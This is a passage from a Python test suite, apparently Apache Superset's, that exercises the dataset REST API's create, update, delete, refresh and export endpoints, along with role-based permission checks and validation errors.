table_id = data.get("id")
model = db.session.query(SqlaTable).get(table_id)
assert model.table_name == table_data["table_name"]
assert model.database_id == table_data["database"]
# Assert that columns were created
columns = (
db.session.query(TableColumn)
.filter_by(table_id=table_id)
.order_by("column_name")
.all()
)
assert columns[0].column_name == "id"
assert columns[1].column_name == "name"
# Assert that metrics were created
columns = (
db.session.query(SqlMetric)
.filter_by(table_id=table_id)
.order_by("metric_name")
.all()
)
assert columns[0].expression == "COUNT(*)"
db.session.delete(model)
db.session.commit()
def test_create_dataset_item_gamma(self):
"""
Dataset API: Test create dataset item gamma
"""
self.login(username="gamma")
main_db = get_main_database()
table_data = {
"database": main_db.id,
"schema": "",
"table_name": "ab_permission",
}
uri = "api/v1/dataset/"
rv = self.client.post(uri, json=table_data)
assert rv.status_code == 403
def test_create_dataset_item_owner(self):
"""
Dataset API: Test create item owner
"""
main_db = get_main_database()
self.login(username="alpha")
admin = self.get_user("admin")
alpha = self.get_user("alpha")
table_data = {
"database": main_db.id,
"schema": "",
"table_name": "ab_permission",
"owners": [admin.id],
}
uri = "api/v1/dataset/"
rv = self.post_assert_metric(uri, table_data, "post")
assert rv.status_code == 201
data = json.loads(rv.data.decode("utf-8"))
model = db.session.query(SqlaTable).get(data.get("id"))
assert admin in model.owners
assert alpha in model.owners
db.session.delete(model)
db.session.commit()
def test_create_dataset_item_owners_invalid(self):
"""
Dataset API: Test create dataset item owner invalid
"""
admin = self.get_user("admin")
main_db = get_main_database()
self.login(username="admin")
table_data = {
"database": main_db.id,
"schema": "",
"table_name": "ab_permission",
"owners": [admin.id, 1000],
}
uri = "api/v1/dataset/"
rv = self.post_assert_metric(uri, table_data, "post")
assert rv.status_code == 422
data = json.loads(rv.data.decode("utf-8"))
expected_result = {"message": {"owners": ["Owners are invalid"]}}
assert data == expected_result
@pytest.mark.usefixtures("load_energy_table_with_slice")
def test_create_dataset_validate_uniqueness(self):
"""
Dataset API: Test create dataset validate table uniqueness
"""
schema = get_example_default_schema()
energy_usage_ds = self.get_energy_usage_dataset()
self.login(username="admin")
table_data = {
"database": energy_usage_ds.database_id,
"table_name": energy_usage_ds.table_name,
}
if schema:
table_data["schema"] = schema
rv = self.post_assert_metric("/api/v1/dataset/", table_data, "post")
assert rv.status_code == 422
data = json.loads(rv.data.decode("utf-8"))
assert data == {
"message": {"table_name": ["Dataset energy_usage already exists"]}
}
def test_create_dataset_same_name_different_schema(self):
if backend() == "sqlite":
# sqlite doesn't support schemas
return
example_db = get_example_database()
example_db.get_sqla_engine().execute(
f"CREATE TABLE {CTAS_SCHEMA_NAME}.birth_names AS SELECT 2 as two"
)
self.login(username="admin")
table_data = {
"database": example_db.id,
"schema": CTAS_SCHEMA_NAME,
"table_name": "birth_names",
}
uri = "api/v1/dataset/"
rv = self.post_assert_metric(uri, table_data, "post")
assert rv.status_code == 201
# cleanup
data = json.loads(rv.data.decode("utf-8"))
uri = f'api/v1/dataset/{data.get("id")}'
rv = self.client.delete(uri)
assert rv.status_code == 200
example_db.get_sqla_engine().execute(
f"DROP TABLE {CTAS_SCHEMA_NAME}.birth_names"
)
def test_create_dataset_validate_database(self):
"""
Dataset API: Test create dataset validate database exists
"""
self.login(username="admin")
dataset_data = {"database": 1000, "schema": "", "table_name": "birth_names"}
uri = "api/v1/dataset/"
rv = self.post_assert_metric(uri, dataset_data, "post")
assert rv.status_code == 422
data = json.loads(rv.data.decode("utf-8"))
assert data == {"message": {"database": ["Database does not exist"]}}
def test_create_dataset_validate_tables_exists(self):
"""
Dataset API: Test create dataset validate table exists
"""
example_db = get_example_database()
self.login(username="admin")
table_data = {
"database": example_db.id,
"schema": "",
"table_name": "does_not_exist",
}
uri = "api/v1/dataset/"
rv = self.post_assert_metric(uri, table_data, "post")
assert rv.status_code == 422
@patch("superset.models.core.Database.get_columns")
@patch("superset.models.core.Database.has_table_by_name")
@patch("superset.models.core.Database.get_table")
def test_create_dataset_validate_view_exists(
self, mock_get_table, mock_has_table_by_name, mock_get_columns
):
"""
Dataset API: Test create dataset validate view exists
"""
mock_get_columns.return_value = [
{"name": "col", "type": "VARCHAR", "type_generic": None, "is_dttm": None,}
]
mock_has_table_by_name.return_value = False
mock_get_table.return_value = None
example_db = get_example_database()
engine = example_db.get_sqla_engine()
dialect = engine.dialect
with patch.object(
dialect, "get_view_names", wraps=dialect.get_view_names
) as patch_get_view_names:
patch_get_view_names.return_value = ["test_case_view"]
self.login(username="admin")
table_data = {
"database": example_db.id,
"schema": "",
"table_name": "test_case_view",
}
uri = "api/v1/dataset/"
rv = self.post_assert_metric(uri, table_data, "post")
assert rv.status_code == 201
# cleanup
data = json.loads(rv.data.decode("utf-8"))
uri = f'api/v1/dataset/{data.get("id")}'
rv = self.client.delete(uri)
assert rv.status_code == 200
@patch("superset.datasets.dao.DatasetDAO.create")
def test_create_dataset_sqlalchemy_error(self, mock_dao_create):
"""
Dataset API: Test create dataset sqlalchemy error
"""
mock_dao_create.side_effect = DAOCreateFailedError()
self.login(username="admin")
main_db = get_main_database()
dataset_data = {
"database": main_db.id,
"schema": "",
"table_name": "ab_permission",
}
uri = "api/v1/dataset/"
rv = self.post_assert_metric(uri, dataset_data, "post")
data = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 422
assert data == {"message": "Dataset could not be created."}
def test_update_dataset_item(self):
"""
Dataset API: Test update dataset item
"""
dataset = self.insert_default_dataset()
self.login(username="admin")
dataset_data = {"description": "changed_description"}
uri = f"api/v1/dataset/{dataset.id}"
rv = self.put_assert_metric(uri, dataset_data, "put")
assert rv.status_code == 200
model = db.session.query(SqlaTable).get(dataset.id)
assert model.description == dataset_data["description"]
db.session.delete(dataset)
db.session.commit()
def test_update_dataset_item_w_override_columns(self):
"""
Dataset API: Test update dataset with override columns
"""
# Add default dataset
dataset = self.insert_default_dataset()
self.login(username="admin")
new_col_dict = {
"column_name": "new_col",
"description": "description",
"expression": "expression",
"type": "INTEGER",
"verbose_name": "New Col",
}
dataset_data = {
"columns": [new_col_dict],
"description": "changed description",
}
uri = f"api/v1/dataset/{dataset.id}?override_columns=true"
rv = self.put_assert_metric(uri, dataset_data, "put")
assert rv.status_code == 200
columns = db.session.query(TableColumn).filter_by(table_id=dataset.id).all()
assert new_col_dict["column_name"] in [col.column_name for col in columns]
assert new_col_dict["description"] in [col.description for col in columns]
assert new_col_dict["expression"] in [col.expression for col in columns]
assert new_col_dict["type"] in [col.type for col in columns]
db.session.delete(dataset)
db.session.commit()
def test_update_dataset_create_column_and_metric(self):
"""
Dataset API: Test update dataset create column
"""
# create example dataset by Command
dataset = self.insert_default_dataset()
new_column_data = {
"column_name": "new_col",
"description": "description",
"expression": "expression",
"extra": '{"abc":123}',
"type": "INTEGER",
"verbose_name": "New Col",
"uuid": "c626b60a-3fb2-4e99-9f01-53aca0b17166",
}
new_metric_data = {
"d3format": None,
"description": None,
"expression": "COUNT(*)",
"extra": '{"abc":123}',
"metric_name": "my_count",
"metric_type": None,
"verbose_name": "My Count",
"warning_text": None,
"uuid": "051b5e72-4e6e-4860-b12b-4d530009dd2a",
}
uri = f"api/v1/dataset/{dataset.id}"
# Get current cols and metrics and append the new ones
self.login(username="admin")
rv = self.get_assert_metric(uri, "get")
data = json.loads(rv.data.decode("utf-8"))
for column in data["result"]["columns"]:
column.pop("changed_on", None)
column.pop("created_on", None)
column.pop("type_generic", None)
data["result"]["columns"].append(new_column_data)
for metric in data["result"]["metrics"]:
metric.pop("changed_on", None)
metric.pop("created_on", None)
metric.pop("type_generic", None)
data["result"]["metrics"].append(new_metric_data)
rv = self.client.put(
uri,
json={
"columns": data["result"]["columns"],
"metrics": data["result"]["metrics"],
},
)
assert rv.status_code == 200
columns = (
db.session.query(TableColumn)
.filter_by(table_id=dataset.id)
.order_by("column_name")
.all()
)
assert columns[0].column_name == "id"
assert columns[1].column_name == "name"
assert columns[2].column_name == new_column_data["column_name"]
assert columns[2].description == new_column_data["description"]
assert columns[2].expression == new_column_data["expression"]
assert columns[2].type == new_column_data["type"]
assert columns[2].extra == new_column_data["extra"]
assert columns[2].verbose_name == new_column_data["verbose_name"]
assert str(columns[2].uuid) == new_column_data["uuid"]
metrics = (
db.session.query(SqlMetric)
.filter_by(table_id=dataset.id)
.order_by("metric_name")
.all()
)
assert metrics[0].metric_name == "count"
assert metrics[1].metric_name == "my_count"
assert metrics[1].d3format == new_metric_data["d3format"]
assert metrics[1].description == new_metric_data["description"]
assert metrics[1].expression == new_metric_data["expression"]
assert metrics[1].extra == new_metric_data["extra"]
assert metrics[1].metric_type == new_metric_data["metric_type"]
assert metrics[1].verbose_name == new_metric_data["verbose_name"]
assert metrics[1].warning_text == new_metric_data["warning_text"]
assert str(metrics[1].uuid) == new_metric_data["uuid"]
db.session.delete(dataset)
db.session.commit()
def test_update_dataset_delete_column(self):
"""
Dataset API: Test update dataset delete column
"""
# create example dataset by Command
dataset = self.insert_default_dataset()
new_column_data = {
"column_name": "new_col",
"description": "description",
"expression": "expression",
"type": "INTEGER",
"verbose_name": "New Col",
}
uri = f"api/v1/dataset/{dataset.id}"
# Get current cols and append the new column
self.login(username="admin")
rv = self.get_assert_metric(uri, "get")
data = json.loads(rv.data.decode("utf-8"))
for column in data["result"]["columns"]:
column.pop("changed_on", None)
column.pop("created_on", None)
column.pop("type_generic", None)
data["result"]["columns"].append(new_column_data)
rv = self.client.put(uri, json={"columns": data["result"]["columns"]})
assert rv.status_code == 200
# Remove this new column
data["result"]["columns"].remove(new_column_data)
rv = self.client.put(uri, json={"columns": data["result"]["columns"]})
assert rv.status_code == 200
columns = (
db.session.query(TableColumn)
.filter_by(table_id=dataset.id)
.order_by("column_name")
.all()
)
assert columns[0].column_name == "id"
assert columns[1].column_name == "name"
assert len(columns) == 2
db.session.delete(dataset)
db.session.commit()
def test_update_dataset_update_column(self):
"""
Dataset API: Test update dataset columns
"""
dataset = self.insert_default_dataset()
self.login(username="admin")
uri = f"api/v1/dataset/{dataset.id}"
# Get current cols and alter one
rv = self.get_assert_metric(uri, "get")
resp_columns = json.loads(rv.data.decode("utf-8"))["result"]["columns"]
for column in resp_columns:
column.pop("changed_on", None)
column.pop("created_on", None)
column.pop("type_generic", None)
resp_columns[0]["groupby"] = False
resp_columns[0]["filterable"] = False
rv = self.client.put(uri, json={"columns": resp_columns})
assert rv.status_code == 200
columns = (
db.session.query(TableColumn)
.filter_by(table_id=dataset.id)
.order_by("column_name")
.all()
)
assert columns[0].column_name == "id"
assert columns[1].column_name, "name"
# TODO(bkyryliuk): find the reason why update is failing for the presto database
if get_example_database().backend != "presto":
assert columns[0].groupby is False
assert columns[0].filterable is False
db.session.delete(dataset)
db.session.commit()
def test_update_dataset_delete_metric(self):
"""
Dataset API: Test update dataset delete metric
"""
dataset = self.insert_default_dataset()
metrics_query = (
db.session.query(SqlMetric)
.filter_by(table_id=dataset.id)
.order_by("metric_name")
)
self.login(username="admin")
uri = f"api/v1/dataset/{dataset.id}"
data = {
"metrics": [
{"metric_name": "metric1", "expression": "COUNT(*)"},
{"metric_name": "metric2", "expression": "DIFF_COUNT(*)"},
]
}
rv = self.put_assert_metric(uri, data, "put")
assert rv.status_code == 200
metrics = metrics_query.all()
assert len(metrics) == 2
data = {
"metrics": [
{
"id": metrics[0].id,
"metric_name": "metric1",
"expression": "COUNT(*)",
},
]
}
rv = self.put_assert_metric(uri, data, "put")
assert rv.status_code == 200
metrics = metrics_query.all()
assert len(metrics) == 1
db.session.delete(dataset)
db.session.commit()
def test_update_dataset_update_column_uniqueness(self):
"""
Dataset API: Test update dataset columns uniqueness
"""
dataset = self.insert_default_dataset()
self.login(username="admin")
uri = f"api/v1/dataset/{dataset.id}"
# try to insert a new column ID that already exists
data = {"columns": [{"column_name": "id", "type": "INTEGER"}]}
rv = self.put_assert_metric(uri, data, "put")
assert rv.status_code == 422
data = json.loads(rv.data.decode("utf-8"))
expected_result = {
"message": {"columns": ["One or more columns already exist"]}
}
assert data == expected_result
db.session.delete(dataset)
db.session.commit()
def test_update_dataset_update_metric_uniqueness(self):
"""
Dataset API: Test update dataset metric uniqueness
"""
dataset = self.insert_default_dataset()
self.login(username="admin")
uri = f"api/v1/dataset/{dataset.id}"
# try to insert a new column ID that already exists
data = {"metrics": [{"metric_name": "count", "expression": "COUNT(*)"}]}
rv = self.put_assert_metric(uri, data, "put")
assert rv.status_code == 422
data = json.loads(rv.data.decode("utf-8"))
expected_result = {
"message": {"metrics": ["One or more metrics already exist"]}
}
assert data == expected_result
db.session.delete(dataset)
db.session.commit()
def test_update_dataset_update_column_duplicate(self):
"""
Dataset API: Test update dataset columns duplicate
"""
dataset = self.insert_default_dataset()
self.login(username="admin")
uri = f"api/v1/dataset/{dataset.id}"
# try to insert a new column ID that already exists
data = {
"columns": [
{"column_name": "id", "type": "INTEGER"},
{"column_name": "id", "type": "VARCHAR"},
]
}
rv = self.put_assert_metric(uri, data, "put")
assert rv.status_code == 422
data = json.loads(rv.data.decode("utf-8"))
expected_result = {
"message": {"columns": ["One or more columns are duplicated"]}
}
assert data == expected_result
db.session.delete(dataset)
db.session.commit()
def test_update_dataset_update_metric_duplicate(self):
"""
Dataset API: Test update dataset metric duplicate
"""
dataset = self.insert_default_dataset()
self.login(username="admin")
uri = f"api/v1/dataset/{dataset.id}"
# try to insert a new column ID that already exists
data = {
"metrics": [
{"metric_name": "dup", "expression": "COUNT(*)"},
{"metric_name": "dup", "expression": "DIFF_COUNT(*)"},
]
}
rv = self.put_assert_metric(uri, data, "put")
assert rv.status_code == 422
data = json.loads(rv.data.decode("utf-8"))
expected_result = {
"message": {"metrics": ["One or more metrics are duplicated"]}
}
assert data == expected_result
db.session.delete(dataset)
db.session.commit()
def test_update_dataset_item_gamma(self):
"""
Dataset API: Test update dataset item gamma
"""
dataset = self.insert_default_dataset()
self.login(username="gamma")
table_data = {"description": "changed_description"}
uri = f"api/v1/dataset/{dataset.id}"
rv = self.client.put(uri, json=table_data)
assert rv.status_code == 403
db.session.delete(dataset)
db.session.commit()
def test_update_dataset_item_not_owned(self):
"""
Dataset API: Test update dataset item not owned
"""
dataset = self.insert_default_dataset()
self.login(username="alpha")
table_data = {"description": "changed_description"}
uri = f"api/v1/dataset/{dataset.id}"
rv = self.put_assert_metric(uri, table_data, "put")
assert rv.status_code == 403
db.session.delete(dataset)
db.session.commit()
def test_update_dataset_item_owners_invalid(self):
"""
Dataset API: Test update dataset item owner invalid
"""
dataset = self.insert_default_dataset()
self.login(username="admin")
table_data = {"description": "changed_description", "owners": [1000]}
uri = f"api/v1/dataset/{dataset.id}"
rv = self.put_assert_metric(uri, table_data, "put")
assert rv.status_code == 422
db.session.delete(dataset)
db.session.commit()
def test_update_dataset_item_uniqueness(self):
"""
Dataset API: Test update dataset uniqueness
"""
dataset = self.insert_default_dataset()
self.login(username="admin")
ab_user = self.insert_dataset(
"ab_user", [self.get_user("admin").id], get_main_database()
)
table_data = {"table_name": "ab_user"}
uri = f"api/v1/dataset/{dataset.id}"
rv = self.put_assert_metric(uri, table_data, "put")
data = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 422
expected_response = {
"message": {"table_name": ["Dataset ab_user already exists"]}
}
assert data == expected_response
db.session.delete(dataset)
db.session.delete(ab_user)
db.session.commit()
@patch("superset.datasets.dao.DatasetDAO.update")
def test_update_dataset_sqlalchemy_error(self, mock_dao_update):
"""
Dataset API: Test update dataset sqlalchemy error
"""
mock_dao_update.side_effect = DAOUpdateFailedError()
dataset = self.insert_default_dataset()
self.login(username="admin")
table_data = {"description": "changed_description"}
uri = f"api/v1/dataset/{dataset.id}"
rv = self.client.put(uri, json=table_data)
data = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 422
assert data == {"message": "Dataset could not be updated."}
db.session.delete(dataset)
db.session.commit()
def test_delete_dataset_item(self):
"""
Dataset API: Test delete dataset item
"""
dataset = self.insert_default_dataset()
view_menu = security_manager.find_view_menu(dataset.get_perm())
assert view_menu is not None
view_menu_id = view_menu.id
self.login(username="admin")
uri = f"api/v1/dataset/{dataset.id}"
rv = self.client.delete(uri)
assert rv.status_code == 200
non_view_menu = db.session.query(security_manager.viewmenu_model).get(
view_menu_id
)
assert non_view_menu is None
def test_delete_item_dataset_not_owned(self):
"""
Dataset API: Test delete item not owned
"""
dataset = self.insert_default_dataset()
self.login(username="alpha")
uri = f"api/v1/dataset/{dataset.id}"
rv = self.delete_assert_metric(uri, "delete")
assert rv.status_code == 403
db.session.delete(dataset)
db.session.commit()
def test_delete_dataset_item_not_authorized(self):
"""
Dataset API: Test delete item not authorized
"""
dataset = self.insert_default_dataset()
self.login(username="gamma")
uri = f"api/v1/dataset/{dataset.id}"
rv = self.client.delete(uri)
assert rv.status_code == 403
db.session.delete(dataset)
db.session.commit()
@patch("superset.datasets.dao.DatasetDAO.delete")
def test_delete_dataset_sqlalchemy_error(self, mock_dao_delete):
"""
Dataset API: Test delete dataset sqlalchemy error
"""
mock_dao_delete.side_effect = DAODeleteFailedError()
dataset = self.insert_default_dataset()
self.login(username="admin")
uri = f"api/v1/dataset/{dataset.id}"
rv = self.delete_assert_metric(uri, "delete")
data = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 422
assert data == {"message": "Dataset could not be deleted."}
db.session.delete(dataset)
db.session.commit()
@pytest.mark.usefixtures("create_datasets")
def test_delete_dataset_column(self):
"""
Dataset API: Test delete dataset column
"""
dataset = self.get_fixture_datasets()[0]
column_id = dataset.columns[0].id
self.login(username="admin")
uri = f"api/v1/dataset/{dataset.id}/column/{column_id}"
rv = self.client.delete(uri)
assert rv.status_code == 200
assert db.session.query(TableColumn).get(column_id) == None
@pytest.mark.usefixtures("create_datasets")
def test_delete_dataset_column_not_found(self):
"""
Dataset API: Test delete dataset column not found
"""
dataset = self.get_fixture_datasets()[0]
non_id = self.get_nonexistent_numeric_id(TableColumn)
self.login(username="admin")
uri = f"api/v1/dataset/{dataset.id}/column/{non_id}"
rv = self.client.delete(uri)
assert rv.status_code == 404
non_id = self.get_nonexistent_numeric_id(SqlaTable)
column_id = dataset.columns[0].id
self.login(username="admin")
uri = f"api/v1/dataset/{non_id}/column/{column_id}"
rv = self.client.delete(uri)
assert rv.status_code == 404
@pytest.mark.usefixtures("create_datasets")
def test_delete_dataset_column_not_owned(self):
"""
Dataset API: Test delete dataset column not owned
"""
dataset = self.get_fixture_datasets()[0]
column_id = dataset.columns[0].id
self.login(username="alpha")
uri = f"api/v1/dataset/{dataset.id}/column/{column_id}"
rv = self.client.delete(uri)
assert rv.status_code == 403
@pytest.mark.usefixtures("create_datasets")
@patch("superset.datasets.dao.DatasetDAO.delete")
def test_delete_dataset_column_fail(self, mock_dao_delete):
"""
Dataset API: Test delete dataset column
"""
mock_dao_delete.side_effect = DAODeleteFailedError()
dataset = self.get_fixture_datasets()[0]
column_id = dataset.columns[0].id
self.login(username="admin")
uri = f"api/v1/dataset/{dataset.id}/column/{column_id}"
rv = self.client.delete(uri)
data = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 422
assert data == {"message": "Dataset column delete failed."}
@pytest.mark.usefixtures("create_datasets")
def test_delete_dataset_metric(self):
"""
Dataset API: Test delete dataset metric
"""
dataset = self.get_fixture_datasets()[0]
test_metric = SqlMetric(
metric_name="metric1", expression="COUNT(*)", table=dataset
)
db.session.add(test_metric)
db.session.commit()
self.login(username="admin")
uri = f"api/v1/dataset/{dataset.id}/metric/{test_metric.id}"
rv = self.client.delete(uri)
assert rv.status_code == 200
assert db.session.query(SqlMetric).get(test_metric.id) == None
@pytest.mark.usefixtures("create_datasets")
def test_delete_dataset_metric_not_found(self):
"""
Dataset API: Test delete dataset metric not found
"""
dataset = self.get_fixture_datasets()[0]
non_id = self.get_nonexistent_numeric_id(SqlMetric)
self.login(username="admin")
uri = f"api/v1/dataset/{dataset.id}/metric/{non_id}"
rv = self.client.delete(uri)
assert rv.status_code == 404
non_id = self.get_nonexistent_numeric_id(SqlaTable)
metric_id = dataset.metrics[0].id
self.login(username="admin")
uri = f"api/v1/dataset/{non_id}/metric/{metric_id}"
rv = self.client.delete(uri)
assert rv.status_code == 404
@pytest.mark.usefixtures("create_datasets")
def test_delete_dataset_metric_not_owned(self):
"""
Dataset API: Test delete dataset metric not owned
"""
dataset = self.get_fixture_datasets()[0]
metric_id = dataset.metrics[0].id
self.login(username="alpha")
uri = f"api/v1/dataset/{dataset.id}/metric/{metric_id}"
rv = self.client.delete(uri)
assert rv.status_code == 403
@pytest.mark.usefixtures("create_datasets")
@patch("superset.datasets.dao.DatasetDAO.delete")
def test_delete_dataset_metric_fail(self, mock_dao_delete):
"""
Dataset API: Test delete dataset metric
"""
mock_dao_delete.side_effect = DAODeleteFailedError()
dataset = self.get_fixture_datasets()[0]
column_id = dataset.metrics[0].id
self.login(username="admin")
uri = f"api/v1/dataset/{dataset.id}/metric/{column_id}"
rv = self.client.delete(uri)
data = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 422
assert data == {"message": "Dataset metric delete failed."}
@pytest.mark.usefixtures("create_datasets")
def test_bulk_delete_dataset_items(self):
"""
Dataset API: Test bulk delete dataset items
"""
datasets = self.get_fixture_datasets()
dataset_ids = [dataset.id for dataset in datasets]
view_menu_names = []
for dataset in datasets:
view_menu_names.append(dataset.get_perm())
self.login(username="admin")
uri = f"api/v1/dataset/?q={prison.dumps(dataset_ids)}"
rv = self.delete_assert_metric(uri, "bulk_delete")
data = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
expected_response = {"message": f"Deleted {len(datasets)} datasets"}
assert data == expected_response
datasets = (
db.session.query(SqlaTable)
.filter(SqlaTable.table_name.in_(self.fixture_tables_names))
.all()
)
assert datasets == []
# Assert permissions get cleaned
for view_menu_name in view_menu_names:
assert security_manager.find_view_menu(view_menu_name) is None
@pytest.mark.usefixtures("create_datasets")
def test_bulk_delete_item_dataset_not_owned(self):
"""
Dataset API: Test bulk delete item not owned
"""
datasets = self.get_fixture_datasets()
dataset_ids = [dataset.id for dataset in datasets]
self.login(username="alpha")
uri = f"api/v1/dataset/?q={prison.dumps(dataset_ids)}"
rv = self.delete_assert_metric(uri, "bulk_delete")
assert rv.status_code == 403
@pytest.mark.usefixtures("create_datasets")
def test_bulk_delete_item_not_found(self):
"""
Dataset API: Test bulk delete item not found
"""
datasets = self.get_fixture_datasets()
dataset_ids = [dataset.id for dataset in datasets]
dataset_ids.append(db.session.query(func.max(SqlaTable.id)).scalar())
self.login(username="admin")
uri = f"api/v1/dataset/?q={prison.dumps(dataset_ids)}"
rv = self.delete_assert_metric(uri, "bulk_delete")
assert rv.status_code == 404
@pytest.mark.usefixtures("create_datasets")
def test_bulk_delete_dataset_item_not_authorized(self):
"""
Dataset API: Test bulk delete item not authorized
"""
datasets = self.get_fixture_datasets()
dataset_ids = [dataset.id for dataset in datasets]
self.login(username="gamma")
uri = f"api/v1/dataset/?q={prison.dumps(dataset_ids)}"
rv = self.client.delete(uri)
assert rv.status_code == 403
@pytest.mark.usefixtures("create_datasets")
def test_bulk_delete_dataset_item_incorrect(self):
"""
Dataset API: Test bulk delete item incorrect request
"""
datasets = self.get_fixture_datasets()
dataset_ids = [dataset.id for dataset in datasets]
dataset_ids.append("Wrong")
self.login(username="admin")
uri = f"api/v1/dataset/?q={prison.dumps(dataset_ids)}"
rv = self.client.delete(uri)
assert rv.status_code == 400
def test_dataset_item_refresh(self):
"""
Dataset API: Test item refresh
"""
dataset = self.insert_default_dataset()
# delete a column
id_column = (
db.session.query(TableColumn)
.filter_by(table_id=dataset.id, column_name="id")
.one()
)
db.session.delete(id_column)
db.session.commit()
self.login(username="admin")
uri = f"api/v1/dataset/{dataset.id}/refresh"
rv = self.put_assert_metric(uri, {}, "refresh")
assert rv.status_code == 200
# Assert the column is restored on refresh
id_column = (
db.session.query(TableColumn)
.filter_by(table_id=dataset.id, column_name="id")
.one()
)
assert id_column is not None
db.session.delete(dataset)
db.session.commit()
def test_dataset_item_refresh_not_found(self):
"""
Dataset API: Test item refresh not found dataset
"""
max_id = db.session.query(func.max(SqlaTable.id)).scalar()
self.login(username="admin")
uri = f"api/v1/dataset/{max_id + 1}/refresh"
rv = self.put_assert_metric(uri, {}, "refresh")
assert rv.status_code == 404
def test_dataset_item_refresh_not_owned(self):
"""
Dataset API: Test item refresh not owned dataset
"""
dataset = self.insert_default_dataset()
self.login(username="alpha")
uri = f"api/v1/dataset/{dataset.id}/refresh"
rv = self.put_assert_metric(uri, {}, "refresh")
assert rv.status_code == 403
db.session.delete(dataset)
db.session.commit()
@unittest.skip("test is failing stochastically")
def test_export_dataset(self):
"""
Dataset API: Test export dataset
"""
birth_names_dataset = self.get_birth_names_dataset()
# TODO: fix test for presto
# debug with dump: https://github.com/apache/superset/runs/1092546855
if birth_names_dataset.database.backend in {"presto", "hive"}:
return
argument = [birth_names_dataset.id]
uri = f"api/v1/dataset/export/?q={prison.dumps(argument)}"
self.login(username="admin")
rv = self.get_assert_metric(uri, "export")
assert rv.status_code == 200
cli_export = export_to_dict(
session=db.session,
recursive=True,
back_references=False,
include_defaults=False,
)
cli_export_tables = cli_export["databases"][0]["tables"]
expected_response = {}
for export_table in cli_export_tables:
if export_table["table_name"] == "birth_names":
expected_response = export_table
break
ui_export = yaml.safe_load(rv.data.decode("utf-8"))
assert ui_export[0] == expected_response
def test_export_dataset_not_found(self):
"""
Dataset API: Test export dataset not found
"""
max_id = db.session.query(func.max(SqlaTable.id)).scalar()
# Just one does not exist and we get 404
argument = [max_id + 1, 1]
uri = f"api/v1/dataset/export/?q={prison.dumps(argument)}"
self.login(username="admin")
rv = self.get_assert_metric(uri, "export")
assert rv.status_code == 404
@pytest.mark.usefixtures("create_datasets")
def test_export_dataset_gamma(self):
"""
Dataset API: Test export dataset has gamma
"""
dataset = self.get_fixture_datasets()[0]
argument = [dataset.id]
uri = f"api/v1/dataset/export/?q={prison.dumps(argument)}"
self.login(username="gamma")
rv = self.client.get(uri)
assert rv.status_code == 403
perm1 = security_manager.find_permission_view_menu("can_export", "Dataset")
perm2 = security_manager.find_permission_view_menu(
"datasource_access", dataset.perm
)
# add perissions to allow export + access to query this dataset
gamma_role = security_manager.find_role("Gamma")
security_manager.add_permission_role(gamma_role, perm1)
security_manager.add_permission_role(gamma_role, perm2)
rv = self.client.get(uri)
assert rv.status_code == 200
@patch.dict(
"superset.extensions.feature_flag_manager._feature_flags",
{"VERSIONED_EXPORT": True},
clear=True,
)
@pytest.mark.usefixtures("load_birth_names_dashboard_with_slices")
def test_export_dataset_bundle(self):
"""
Dataset API: Test export dataset
"""
birth_names_dataset = self.get_birth_names_dataset()
# TODO: fix test for presto
# debug with dump: https://github.com/apache/superset/runs/1092546855
if birth_names_dataset.database.backend in {"presto", "hive"}:
return
argument = [birth_names_dataset.id]
uri = f"api/v1/dataset/export/?q={prison.dumps(argument)}"
self.login(username="admin")
rv = self.get_assert_metric(uri, "export")
assert rv.status_code == 200
buf = BytesIO(rv.data)
assert is_zipfile(buf)
@patch.dict(
"superset.extensions.feature_flag_manager._feature_flags",
{"VERSIONED_EXPORT": True},
clear=True,
)
def test_export_dataset_bundle_not_found(self):
"""
Dataset API: Test export dataset not found
"""
# Just one does not exist and we get 404
argument = [-1, 1]
uri = f"api/v1/dataset/export/?q={prison.dumps(argument)}"
self.login(username="admin")
rv = self.get_assert_metric(uri, "export")
assert rv.status_code == 404
@patch.dict(
"superset.extensions.feature_flag_manager._feature_flags",
{"VERSIONED_EXPORT": True},
clear=True,
)
@pytest.mark.usefixtures("create_datasets")
def test_export_dataset_bundle_gamma(self):
"""
Dataset API: Test export dataset has gamma
"""
dataset = self.get_fixture_datasets()[0]
argument = [dataset.id]
uri = f"api/v1/dataset/export/?q={prison.dumps(argument)}"
self.login(username="gamma")
rv = self.client.get(uri)
# gamma users by default do not have access to this dataset
assert rv.status_code == 403
@unittest.skip("Number of related objects depend on DB")
@pytest.mark.usefixtures("load_birth_names_dashboard_with_slices")
def test_get_dataset_related_objects(self):
"""
Dataset API: Test get chart and dashboard count related to a dataset
:return:
"""
self.login(username="admin")
table = self.get_birth_names_dataset()
uri = f"api/v1/dataset/{table.id}/related_objects"
rv = self.get_assert_metric(uri, "related_objects")
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
assert response["charts"]["count"] == 18
assert response["dashboards"]["count"] == 1
def test_get_dataset_related_objects_not_found(self):
"""
Dataset API: Test related objects not found
"""
max_id = db.session.query(func.max(SqlaTable.id)).scalar()
# id does not exist and we get 404
invalid_id = max_id + 1
uri = f"api/v1/dataset/{invalid_id}/related_objects/"
self.login(username="admin")
rv = self.client.get(uri)
assert rv.status_code == 404
self.logout()
self.login(username="gamma")
table = self.get_birth_names_dataset()
uri = f"api/v1/dataset/{table.id}/related_objects"
rv = self.client.get(uri)
assert rv.status_code == 404
@pytest.mark.usefixtures("create_datasets", "create_virtual_datasets")
def test_get_datasets_custom_filter_sql(self):
"""
Dataset API: Test custom dataset_is_null_or_empty filter for sql
"""
arguments = {
"filters": [
{"col": "sql", "opr": "dataset_is_null_or_empty", "value": False}
]
}
self.login(username="admin")
uri = f"api/v1/dataset/?q={prison.dumps(arguments)}"
rv = self.client.get(uri)
assert rv.status_code == 200
data = json.loads(rv.data.decode("utf-8"))
for table_name in self.fixture_virtual_table_names:
assert table_name in [ds["table_name"] for ds in data["result"]]
arguments = {
"filters": [
{"col": "sql", "opr": "dataset_is_null_or_empty", "value": True}
]
}
self.login(username="admin")
uri = f"api/v1/dataset/?q={prison.dumps(arguments)}"
rv = self.client.get(uri)
assert rv.status_code == 200
data = json.loads(rv.data.decode("utf-8"))
for table_name in self.fixture_tables_names:
assert table_name in [ds["table_name"] for ds in data["result"]]
def test_import_dataset(self):
"""
